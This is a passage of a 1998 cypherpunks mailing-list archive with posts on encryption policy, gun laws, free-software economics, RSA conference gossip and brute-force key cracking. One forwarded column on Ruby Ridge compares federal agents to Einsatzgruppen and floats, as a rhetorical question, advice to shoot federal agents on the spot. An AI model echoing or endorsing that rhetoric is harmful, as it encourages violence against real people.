	"We already have a presidential commission considering whether to 
recommend additional public interest obligations for broadcasters solely 
because they will be converting to digital technology.  Mr. Ornstein's 
comments illustrate the ominous ease with which government might attempt 
to impose so-called public interest obligations on other types of digital 
media, such as on-line information services, DBS, cable, and perhaps even 
newspapers that are digitally transmitted to printing plants," Maines said.
	"The Gore Commission is correct to note that over-the-air 
television is far from the only medium serving today's consumer.  That 
felicitous fact, however, ought to lead the Commission to recommend a 
lessening of the obligations on broadcasters, not an increase on 
broadcasters and everyone else."
	The recent experience of the Communications Decency Act 
demonstrates the government's willingness to control digital speech.  The 
digital convergence argument could be a  new rationale for further such 
interventions, Maines warned.
	Maines spoke on behalf of The Media Institute's Public Interest 
Council, a four-member group created recently to study the public interest 
question and to follow the work of the Gore Commission.  Members include 
communications attorneys Robert Corn-Revere and J. Laurent Scharff, and 
constitutional scholars Robert M. O'Neil and Laurence H. Winer.  
	Information about The Media Institute, its Public Interest 
Council, and the Gore Commission is available on-line at 
http://www.mediainst.org.









--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
Date: Thu, 22 Jan 1998 04:40:55 +0800
To: sherman@cs.umbc.edu
Subject: Re: $50 encryption policy contest
In-Reply-To: <Pine.SOL.3.95.980120003716.18100B-100000@topdog.cs.umbc.edu>
Message-ID: <199801202332.SAA15787@deathstar.jabberwock.org>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Dr. Alan Sherman wrote:
: 
:  3. (**important**) The page of submitted questions must have a means
:     by which anyone can score the quality of the question on a scale
:     of 1 to 5 (say, by clicking on the appropriate score button), with
:     5 being the highest score.  For each question, its median score
:     must be displayed.  Questions must be listed in order of
:     decreasing median scores.  
: 

I'm amused by how this requirement was thrown in.  Never even mentioned
in the overview.

So, what you're looking for is some kid who will work for peanuts writing
some CGI scripts for you.  This comes off as an insult.

Mark

- -- 
[] Mark Rogaski                   "That which does not kill me
[] wendigo@pobox.com                 only makes me stranger."
[]
[]      finger wendigo@deathstar.jabberwock.org for PGP key
[] anti spambot: postmaster@localhost abuse@localhost uce@ftc.gov

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNMU0CnzbrFts6CmBAQF8JQf/ZK6rxt77tLCf6C7cvG2JBm/Fx9VFhZ6F
88JGqUWCdA51ihErVuxiUlC45DxKibWuXcbHATFBo0azWYYefSd1DwNtZgFP+T4i
+X9K29CTyDM/qOwWWg+sDNab4jus+mwsD/nccbdKf+jafLU2xl09oPQLGfy01E9Q
ZvE7YYP4ZqX9UXt+UmBpaefmgC6GAhIC0ovS9kA6QUs9jSDnJshVWHeMhvmHVF8I
OP9lI6gledcN07ps9hm8DoH9ptOdOjfUPEzx723DSVEq2GkYSAO0B4JFeV96lhVy
uPsI6mv370vRZbRHQvMVBStt8Sg9FVtKNMA5EIEus3+0yxJjITKPUQ==
=AdmV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 22 Jan 1998 06:07:34 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: Confiscation is here, Make the most of it. (fwd)
Message-ID: <v040039d6b0eb179881f4@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
Date: Tue, 20 Jan 1998 10:06:17 -0800
To: Robert Hettinga <rah@shipwright.com>
From: <snip>
Subject: Fwd: Confiscation is here, Make the most of it. (fwd)
Status: U

>Date: Tue, 20 Jan 1998 07:45:01 -0800 (PST)
>From: <snip><snip>
>Subject: Confiscation is here, Make the most of it. (fwd)
>Mime-Version: 1.0
>To: <snip>
>
>Daryl Davis, author of the letter forwarded by Schrader, is the range-
>master for the Santa Clara County Corrections Department and <snip>
>
>---------- Forwarded message ----------
>Date: Mon, 19 Jan 1998 09:46:37 -0800
>From: Mike Schrader <bay2a@webnexus.com>
>To: ca-firearms@lists.best.com
>Subject: Confiscation is here, Make the most of it.
>
>The following text was written to be presented to our (Santa Clara
>County's) Republican Central Committee, to wake up the moderates, that bad
>laws have unintentended consequences. Feel free to use it to do similar
>work.
>
> Also see the advice at the end, and add my own that now is the time to
>turn the heat up on both Lungren the candidate and your local
>representatives to the state houses that voting for more bad laws will
>never get them reelected. Neither party will be safe from the backlash on
>this one. Neither party can distance themselves from those consequences.
>
>Don't let them.
>
>Yours,
>Mike Schrader
>
>
>
>
>Confiscation Comes to California
>Lungren fulfills Feinstein's fantasy
>
>
>By Daryl N. Davis
>
>
>	They said it would never happen. Any suggestion that it would was
>derided
>as "NRA paranoia." They told us they only wanted "reasonable controls."
>
>	Well, it has happened. Gun confiscation is now the law in California.
>Thank you, Dan Lungren!
>
>	In a letter dated November 24, 1997, The Man Who Would Be Governor
>declared that SKS rifles with detachable magazines, unless the owners can
>prove they acquired the rifles prior to June 1, 1989, are illegal "and must
>be relinquished to a local police or sheriff's department." This is a
>reversal of the opinion held by Mr. Lungren from the time he took office in
>January 1991, and which has been conveyed in numerous training sessions for
>peace officers, criminalists and prosecutors during the past four years.
>
>When the Roberti-Roos Assault Weapons Control Act (AWCA) became law in
>January 1989, it included "SKS with detachable magazine." At that time,
>there were two distinct models-one with a fixed magazine (Type 56) and one
>with a detachable, AK-47 magazine (Type 84). President Bush banned
>importation of the Type 84 in 1990. Later that year, aftermarket detachable
>magazines (which are not interchangeable with the AK-47 magazine) became
>available for SKS rifles originally designed to use only a fixed magazine.
>
>	Until September 1997, Mr. Lungren's position had been that only the
>Type
>84 was an "assault weapon." He allowed the sale of the aftermarket
>detachable magazines and of SKS rifles equipped with them. He also allowed
>the sale of the SKS Sporter, basically a Type 84 that, in compliance with
>the import restrictions imposed by President Bush, had its bayonet lug
>ground off and was fitted to a sporting stock rather than a military stock.
>
>	In September 1996, the Attorney General's office asked the state
>Supreme
>Court to "on its own motion order review of the Court of Appeals
>decision..." in the Dingman case. James Dingman had been convicted of
>possession of an unregistered assault weapon (Type 56 with detachable
>magazine) and his conviction was upheld by the Court of Appeals for the
>Sixth District. Chief Deputy Attorney General (now candidate for Attorney
>General) David Stirling wrote:
>
>"The impact of the court's opinion cannot be over stated because of the
>millions of SKS rifles and after-market magazines currently in circulation.
>Tens of thousands of California citizens may become criminals simply by
>using a perfectly lawful rifle with a lawfully purchased magazine without
>adequate notice that such activity brings them within the proscriptions of
>the AWCA."
>
>In October 1996, in response to the "unprecedented" request by the Attorney
>General, the Supreme Court granted review of the Dingman case. In February
>1997, the Attorney General's office filed an amicus brief with the Supreme
>Court in support of Dingman; they asked that the opinion of the Court of
>Appeals be "reversed."
>
>	In September 1997, in response to a series of blatantly biased and
>aggressively uninformed hit pieces in the Los Angeles Times, Mr. Lungren
>reversed himself. He withdrew his amicus brief in the Dingman case, stating
>that it "inaccurately reflects the view of the Attorney General." Deputy
>Attorney General Paul Bishop, who had worked on the AWCA project since
>1989, was transferred.
>
>	Thanks to Mr. Lungren, "tens of thousands of California citizens" must
>either surrender their lawfully acquired property without compensation or
>become felons. Gun dealers throughout the state face felony prosecution, on
>individual counts, for each detachable magazine SKS they sold during the
>six years Mr. Lungren assured them it was legal to do so. Furthermore, the
>opinion does nothing to clarify what constitutes a "SKS with detachable
>magazine." Must the magazine be affixed to the rifle? With the rifle? The
>rifle in the owner's gun safe and the magazine buried somewhere in a box of
>miscellaneous parts in his/her garage?
>
>	On CBS's "60 Minutes" on February 5, 1995, Senator Dianne Feinstein
>declared, "If I could have gotten 51 votes in the Senate of the United
>States for an outright [firearms] ban, picking up every one of them, Mr.
>and Mrs. America turn them all in, I would have done it."  Thanks to Dan
>Lungren, Feinstein's fantasy is well on its way to becoming reality.
>Whether Mr. Lungren's fantasy of currying favor with the loony Left at the
>Los Angeles Times becomes reality, remains to be seen.
>
>
>
>
>What Should I Do?
>
>1. If a law enforcement officer attempts to confiscate your SKS, live to
>fight another day. DO NOT RESIST! Do get a receipt, though.
>
>2. Contact Governor Wilson and firmly but politely express your outrage at
>this situation. In addition to infringing the Second Amendment, the AG's
>position creates a taking of private property without just compensation
>(Fifth Amendment) and an ex post facto application of the Assault Weapons
>Control Act (Article I, Section 9, Paragraph 3).
>Gov. Pete Wilson
>State Capitol
>Sacramento, CA 95814
>Phone: 916-445-2864
>FAX: 916-445-4633
>
>3. Become active in your local NRA Members Council. You may call the
>Silicon Valley Members Council at 408-235-9175, 24 hours a day, for up to
>date legislative information or for information on contacting a Members
>Council in your area.
>


<snip>
--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 22 Jan 1998 05:27:56 +0800
To: cypherpunks@cyberpass.net
Subject: Swinestein for Senate!
Message-ID: <199801210011.BAA16725@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ACRAMENTO, Calif. (AP) - Sen. Dianne Feinstein ruled out a race for the
Democratic nomination for governor Tuesday, saying she didn't want to
enter "a very debilitating campaign environment."
	Feinstein's decision came less than two weeks after President
Clinton personally urged her to enter the race. That call followed pleas
by Democratic members of Congress and the state Legislature to run.
	"I made the decision definitely last week," she told reporters in
a telephone conference. "It was like a huge weight that came off my
shoulders."
	"It's a long story. There probably has been no decision in my life
... that I have put more thought and energy into. There also has been none
that has caused me more angst," Feinstein said.
	"The decision moment came in a way ... in the conversation with
the president ... I thought if any call were to push me over the brink, it
would be a call from the president of the United States."
	Feinstein said it was during that conversation that "I realized my
ambivalence," she said.
	Feinstein, who had been weighing a race for the Democratic
nomination for months, said she could serve the people of California
better in the U.S. Senate.

Gov. Pete Wilson, a Republican, can't run again this year because of term
limits. The leading Republican candidate is Attorney General Dan Lungren.
	Other Democrats considering running are Lt. Gov. Gray Davis,
businessman Al Checchi and state Senator John Vasconcellos.
	Feinstein, 64, lost a close race for governor in 1990 to Wilson.
She was elected to the remaining two years of Wilson's Senate term in
1992, defeating his appointed successor, and ran again in 1994 to win a
full six-year term.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 22 Jan 1998 05:24:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Deriving economic profits from writing FREE software?
In-Reply-To: <slrn6c0bra.sic.igor@manifold.algebra.com>
Message-ID: <199801210243.DAA05915@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:

> At 10:11 PM 1/16/98 -0600, Igor wrote:
> >However, aside from the psychic benefits, I would like to somehow derive
> >an economic profit from being a freeware author. So far, I feel that the
> >status of the author of a popular package does sound good on a resume, but
> >it is as far as I could get.
> >
> >Does anyone else feel the same way? Has anybody come up with a way to
> >cash in on the free programs that he writes?
> 
> There's the standard shareware model - ask for $25.
> There's the Cygnus model - charge money for support.
> There's the Netscape/McAfee/etc. model - free for personal use,
>         charge money to companies that use it.
> There's the Eudora model - basic version free, bells&whistles extra.
> There's the advertising-banner model - the software/service is free,
>         but usage hits an advertising banner in some way that
>         filters money back to you.

There's the Intel model - give away software to sell new hardware.
There's the Linus Torvalds model - people pay you to speak at conferences.
There's the w3c model - pay money if you want it now, or wait and get it for
        free next month.
There's the book model - give away the software and sell the documentation.
There's the PGP model - give it away until it becomes popular, then sell it.

...and then there's the Microsoft model - give away 'free' software and
   charge for the OS to run it...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Thu, 22 Jan 1998 05:58:15 +0800
To: cypherpunks@cyberpass.net
Subject: Two Turntables and a Clipper Chip
Message-ID: <dbd1e6f4a03c21b258450750255cbd6e@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




              Two turntables and a
              Clipper chip 
              By Skinny DuBaud 
              January 15, 1998 

              SAN FRANCISCO--In what certainly was
              not a hacker's delight, RSA Data
              Security CEO Jim Bidzos stunned the
              crowd at his company's annual
              conference this week as he joined
              old-school rappers The Sugar Hill Gang
              for a detourned version of da Gang's
              classic, "Rapper's Delight." 

              Well aware that he's no Kool Moe Dee,
              Bidzos hip-hopped his way through the
              modified lyrics, which contained such
              sparkling couplets as... "They once
              proposed a thing called Clipper
              Now there's something new that ain't
              much hipper
              Key recovery won't work, so the experts
              say
              But the government wants to push it on
              us anyway"

              and 

              "I like hip hip hop 
              I like to online shop
              I trust RSA
              To keep the hackers at bay"
              ...then promised never to pull such a
              stunt again. The RSA conference
                                  audience of
                                  crypto-math
                                  geeks,
                                  cyberlibertarians,
                                  and snoop-dogs
                                  cheered, of
                                  course. They'd
                                  throw their
                                  hands in the air
                                  (and wave them
                                  like they just
                                  don't care) for a
              wet sponge if it smelled
              antiauthoritarian, but many breathed a
              sigh of relief. 

              Despite the awkward moments, Bidzos,
              who's made quite a name for himself as
              a public enemy of the federal
              government's restrictions on the export
              of encryption software, looked
              mahvelous sporting a fresh Van Dyke
              facial-hair arrangement on his
              prizefighter's mug. He apparently grew
              the ensemble to match the Sugar Hill
              Gang--in appearance at least, if not in
              dope MC talent. Always the suave host,
              Jim will be back among his tribe at the
              end-of-conference gala, for which the
              company has rented out the California
              Academy of Sciences in Golden Gate
              Park. 

              The Skintelligentsia certainly will be
              there looking out for any
              representatives of Pretty Good Privacy,
              the crypto company enmeshed in legal
              battles with RSA. The PGP-brains don't
              have a booth at the RSA conference this
              year, but in celebration of their merger
              with Network Associates--the newly
              formed utility software company, that
              is, not the PR agency--they managed to
              throw a soiree last night at the
              Marky-Mark Hopkins Hotel, right
              across the street from the RSA
              proceedings at the equally fly Fairmont.

              Speaking of snubs, crypto rivals
              VeriSign and GTE, whose booths at the
              Fairmont were practically alongside one
              another, have been playing a bit of
              one-upmanship recently. Certificate
              authority (CA) VeriSign uses hardware
              storage from BBN to safeguard software
              encryption keys at its Silicon Valley
              offices. The hardware--which looks like
              small blue boxes about the size of a
              desktop telephone set--is the crypto
              equivalent of a strong box, ostensibly
              impervious to hackers. But BBN was
              recently bought by GTE, which owns
              rival CA Cybertrust Solutions, and all of
              a sudden, VeriSign isn't satisfied with
              the "performance" of those little blue
              boxes. The company has started looking
              elsewhere for its strong-box solutions,
              according to a Skinside source. How
              will users of encryption trust the
              "trusted third parties" if the trusted
              third parties don't trust each other? 

              Staying in Baghdad by the Bay, the
              conspiracy birds are clacking their
              beaks over the latest public
              transportation developments. S.F.'s
              Municipal Railway (or "Muni," as the
              local posse calls it) has just opened an
              extension from the end of Market
              Street down to Willie Mays Plaza, now
              just a gaping pit where the new
              baseball stadium will spring up by the
              year 2000. The shorthand for the new
              rail spur? "MMX," short for Muni Metro
              Extension. Sure, the project's gone over
              budget, but I swear it fixed that
              floating-point problem years ago... 

              Speaking of Big Willie Style, San Fran's
              mayor Willie Brown--who looks great in
              a fedora, I must say--may be second
              only to Bill Gates when it comes to
              haughty treatment of minions, but do
              Willie's employees sit on Thai temples
              and proclaim their divinity? That's
              apparently what happened to a
              Microsoft programmer on vacation.
              According to email making the rounds
              among MSN and WebTV employees, the
              young fellow (who didn't answer his
              Redmond phone when my agents rang
              him up) overheated his circuits,
              perched himself atop an ancient Thai
              temple for 10 hours, and told the
              authorities he was God. It took
              scaffolding and a special police
              neck-hold to bring him down, according
              to the report. Brutal, Juice, brutal! 

              Whether the item is true or not, it
              produced some amusing comments as
              it made its way through the outer
              provinces of Lawrence Lessig's favorite
              evil empire. 

              "So, um, how closely are we supposed
              to try to blend into the Microsoft
              culture?" mused one WebTV employee
              as the tidbit made its way around the
              company. 

              "I'm sure that each of us, at one time or
              another, has had the experience of
              waking up in some God-forsaken
              tropical paradise and feeling that
              horrible falling sensation that comes
              from being separated from your desk
              and workstation," wrote another
              Webhead. 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Thu, 22 Jan 1998 06:10:53 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Intel introduces new compression technology for surfers [CNN]
In-Reply-To: <199801201459.IAA26531@einstein.ssz.com>
Message-ID: <3.0.5.32.19980121091153.034e0100@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 08:59 AM 1/20/98 -0600, Jim Choate wrote:
>
>Forwarded message:
>
>>    
>>               INTEL INTRODUCES TECHNOLOGY TO SURF THE WEB FASTER
>>                                        
>>      January 19, 1998
>>      Web posted at: 9:35 p.m. EST (0235 GMT)
>>      
>>      HILLSBORO, Oregon (AP) -- The World Wide Wait may be over.
>>      
>>      Computer chip giant Intel on Monday announced a way for Internet
>>      surfers to download images twice as fast over regular phone lines
>>      without any special equipment or software -- but it will add about
>>      $5 to monthly access fees.
>>      
>>      The technology called Quick Web is installed on the computers called
>>      servers that Internet services use to store and relay data. The
>>      combination of Intel hardware and special software compresses all
>>      the graphic images that are piped through the server, boosting
>>      access speed.
>>      
>>      "The more pictures on the screen, the faster it is," said Dave
>>      Preston, Internet marketing manager for Intel.

This sounds like a real interesting scam.  Graphic files on servers are
already compressed.  Have they found some way to compress already
compressed files?  And if it does not require special software at the
client end, then they must be decompressing it before sending the file.

Or maybe they just convert all the images to low quality jpegs.

This has "Idea from Marketing" written all over it.

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Thu, 22 Jan 1998 01:28:52 +0800
To: cypherpunks@ssz.com
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
In-Reply-To: <3.0.5.32.19980117194905.008024e0@pobox1.stanford.edu>
Message-ID: <19980121092011.14981@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Jan 21, 1998 at 03:04:07AM +0100, Anonymous wrote:
> Bill Stewart writes:
> 
> > >Do the math, though, for 128bit.  There are traditional analyses
> > >which include the amount of silicon on the earth, the number of atoms
> > >in the universe, etc.  The general consensus is that traditional
> > >techniques are not feasible for brute forcing 128bit ciphers before
> > >the heat death of the universe.
> > 
> > Hard to say.  Assuming that Quantum Cryptography doesn't allow
> > finite-sized computers to do large exponentially complex calculations
> > in short finite time, you're probably limited by the number of atoms
> > in the available supply of planets, and Heisenberg may still get you
> > if that's not a low enough limit.  Moore's law isn't forever.
> 
> A practical 128-bit key-cracker could be built with about 10000 cubic
    ^^^^^^^^^
> meters of silicon.  (Figure one transistor per cubic micron, 1 ghz
> operation, do the math...)  The technology to build a computer of that
> size is still a few years away, but it is theoretically possible to build
                                            ^^^^^^^^^^^^^
> a 128-bit key-cracker without using quantum computers or travelling to
> other planets.

"In theory, theory and practice are the same, but in practice they 
are different."

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 22 Jan 1998 05:10:20 +0800
To: cypherpunks@cyberpass.net (Cypherpunks Mailing List)
Subject: javasoft password?
Message-ID: <199801211442.JAA01798@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



http://developer.javasoft.com

ok, so who set the password for the cypherpunks account here, and why
isn't it cypherpunks or writecode? :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 22 Jan 1998 16:32:50 +0800
To: Anonymous <cypherpunks@toad.com
Subject: Re: Other c'punk lists?
In-Reply-To: <964b42d2ad6119da33ff9f4184394baf@anon.efga.org>
Message-ID: <3.0.5.32.19980121102016.008405d0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:24 PM 1/18/98 -0500, Anonymous wrote:
>are there any other cypherpunk lists?  With all due respect
>this list has a *lot* of noise <g>  Perhaps something with-
>out the anarchy.  I enjoy the wild side of this list but
>I would also like something more targeted.

cypherpunks-announce@toad.com - announcements only.
coderpunks-request@toad.com - code-related issues
cryptography-request@c2.net - Perry Metzger's relatively low-noise list
FCPUNX - Ray Arachelian's filtered list - about 10% of cypherpunks
cypherpunks-lite - Eric Blossom's filtered list - $20/year.
cypherpunks-j@htp.org (I think that's where it is.) In Japanese.
various topical lists, like remailer-operators and ietf-open-pgp
alt.cypherpunks, if it's not moribund yet.
sci.crypt - for more technical, usually less political noise
sci.crypt.research  - low-volume  technical
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 22 Jan 1998 04:47:33 +0800
To: cypherpunks@cyberpass.net
Subject: Student expelled for writing hacking article, from Netly News
Message-ID: <Pine.GSO.3.95.980121105019.14953B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 21 Jan 1998 10:49:17 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Student expelled for writing hacking article, from Netly News

The "So You Want To Be A Hacker" article in question:

  http://cgi.pathfinder.com/netly/editorial/019821.html

-Declan

******

http://cgi.pathfinder.com/netly/opinion/0,1042,1699,00.html

The Netly News (http://netlynews.com/)
January 21, 1998

Hacking 101
by Declan McCullagh (declan@well.com)

        The end of senior year for most high school students is a time
   for college decisions, vacation planning and beer-tinged teenage
   revelry. Not so for Justin Boucher.

        Today the Milwaukee, Wisconsin-area native will be expelled from
   Greenfield High School because of an article he wrote entitled "So You
   Want To Be A Hacker." Published under a pseudonym in an unofficial
   student newspaper, it described in colorful (and sometimes profane)
   language how enterprising snoops could break into the high school's
   computer network.

        The advice ranged from the glaringly obvious ("Some commonly used
   passwords at very stupid schools are...") to the Hacker Code of Ethics
   ("Never harm, alter or damage any computers"). The finer points of
   hacker morality and teenage toomfoolery, however, were lost on irate
   school officials, who expelled Boucher for one year.

[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 22 Jan 1998 06:07:28 +0800
To: cypherpunks@cyberpass.net
Subject: Jan. 23 column - Horiuchi
Message-ID: <v040039e5b0ebce8f33a7@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 20 Jan 1998 23:59:33 -0700
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
Date: Tue, 20 Jan 1998 23:00:37 -0800
To: cathy@engr.colostate.edu
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Jan. 23 column - Horiuchi
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/424
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED JAN. 23, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    'Protecting him, by a mock Trial, from Punishment for any Murders ...'

    What does the Declaration of Independence actually consist of?

  Sure, from our school days, we may remember that "these United Colonies
are, and of Right ought to be, Free and Independent States."

  But that's only the last paragraph.

  Prior to that,  Mr. Jefferson and his co-signers spent 29 paragraphs
doing ... what?

  "Declaring their causes," of course! We did this -- anyone would have the
right to do this -- because of a "long train of Abuses and Usurpations,"
remember?

  "He has erected a Multitude of new Offices, and sent hither Swarms of
Officers to harrass our People, and eat out their Substance." Remember?

  "He has kept among us, in Times of Peace, Standing Armies, without the
consent of our Legislatures.

  "He has affected to render the Military independent of and superior to
the Civil Power.

  "He has combined with others to subject us to a Jurisdiction foreign to
our Constitution, and unacknowledged by our Laws; giving his Assent to
their Acts of Pretended Legislation:

  "For quartering large Bodies of Armed Troops among us:

  "For protecting them, by a mock Trial, from Punishment for any Murders
which they should commit on the Inhabitants of these States. ..."

  This is not just schoolboy stuff. A message etched in fire from our
patrimony, these words tell us how Americans shall know when they are again
justified in declaring themselves free of a parasitical tyrant.

  Fast forward 216 years, to the late summer of 1992. Part-time gunsmith
Randy Weaver had failed to show up for a court date, after being entrapped
by ATF agents hoping to turn him into a snitch, to spy on a nearby CHURCH.

  Federal marshals now trespass on the Weaver family's private Idaho
property (the marshals carry no warrant this day and are not there to make
an arrest), and open fire when they're spotted by the family dog, killing
the dog, and also Weaver's 14-year-old son, Sammy. A federal marshal is
also killed, either in self defense or by fratricidal fire. (The federals
never release any shell casings or autopsy results for independent review
-- but a jury acquits Weaver and family friend Kevin Harris in the death.)

  The federal government answers by flooding the property with hundreds
more trespassers in full combat gear. FBI sniper Lon Horiuchi then shoots
at Weaver and Harris as the pair races back to his front door, after paying
their respects to young Sammy's body in an outbuilding. One of Horiuchi's
shots passes through the window of the kitchen door, shooting away much of
the brain of Weaver's wife Vicky, for whom there are no warrants
outstanding. At the moment prior to her death (which comes after 30 seconds
of blood-curdling screams), Vicki Weaver was holding her baby in her arms
in her own kitchen, threatening no one.

  Unaware they have murdered Vicky Weaver, federal agents continue to shout
taunting remarks at her dead body, in the full hearing of her children, for
days. The federal government eventually pays Weaver -- acquitted of murder
and all other major charges -- and his children $3.1 million in damages for
these wrongful actions.

  After a year-long review, the U.S. Justice Department decides in 1994 not
to charge sniper Lon Horiuchi with any crime. Like the Germans at
Nuremberg, they declare he was "just following orders."

  But, just before the five-year statute of limitations is due to toll, in
August of 1997, Boundary County (Idaho) Prosecutor Denise Woodbury bravely
files a charge of involuntary manslaughter against this armed trooper, who
has long been quartered among us as part of the 60,000-strong federal
"standing army" of FBI, DEA, ATF and other Einsatzgruppen troopers.

  Here now is the vital test. Will this "king's officer" be allowed to
stand trial on the evidence, before a randomly selected jury of Idahoans,
in their own state court? Or will the new king "protect him, by a mock
Trial, from Punishment for any Murders which he has committed on the
Inhabitants of these States"?

  Jan. 7, 1998: The Associated Press informs us:

  "BONNERS FERRY, Idaho (AP) -- A judge today ordered an FBI sharpshooter
to stand trial on a state manslaughter charge for the death of white
separatist Randy Weaver's wife in the 1992 siege at Ruby Ridge. ...

  "Magistrate Judge Quentin Harden ... scheduled a Feb. 13 arraignment
before state Judge James Michaud."

  So far so good.

  But now the inevitable:

  Jan. 12, 1998: "BOISE, Idaho (AP) -- FBI sharpshooter Lon Horiuchi won
his bid today to be tried in federal court on the state charge brought
against him in the death of white separatist Randy Weaver's wife in the
1992 siege at Ruby Ridge. ...

  "Horiuchi, supported by the U.S. Justice Department, petitioned the federal
court to take over the case on grounds that the transfer is allowed when
federal agents are prosecuted for conduct in their official capacity.

  "U.S. District Judge Edward Lodge agreed. ...

  Neither murder nor manslaughter, of course, is a federal crime. State
courts have sole jurisdiction to try such cases.

  Clearly, the federals want jurisdiction here so they can either dismiss
the case, or (if a public outcry renders that unwise) so limit the evidence
admitted that the question to be decided ends up nothing more than "Was
Agent Horiuchi obeying what he believed was a lawful order at the time?"

  Sort of like letting Martin Borman set the ground rules for the Nuremberg
trials.

  Modern federal judges -- like Judge Smith in the trial of the Waco
survivors -- are famous for declaring "The United States government isn't
going to be put on trial in my courtroom."

  As one of my e-mail correspondents puts it: "The test for whether one is
living in a police state is that those who are charged with enforcing the
law are allowed to break the laws with impunity."

  This -- along with Janet Reno and her Waco Killers still roaming free, of
course -- is the great modern test of whether this Union can long endure.

  If Lon Horiuchi walks (or even if some untimely "accident" allows him to
escape justice) while the surviving VICTIMS of the federal assault at Waco
are still serving long prison terms, after being found INNOCENT of all
major charges, then what shall we say to the patriot who advises: "If you
see a federal agent committing a crime, don't bother turning him in, just
shoot him down like a dog. Kill him on the spot, and walk away without
giving it a moment's thought."

  Showing our respect for due process, do we continue to say: "Oh no, that
would be wrong. Just turn him in to the proper authorities, and justice
will be done"?

  Do we, really?

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com.

***


Vin Suprynowicz,   vin@lvrj.com

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."    -- Samuel Adams

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
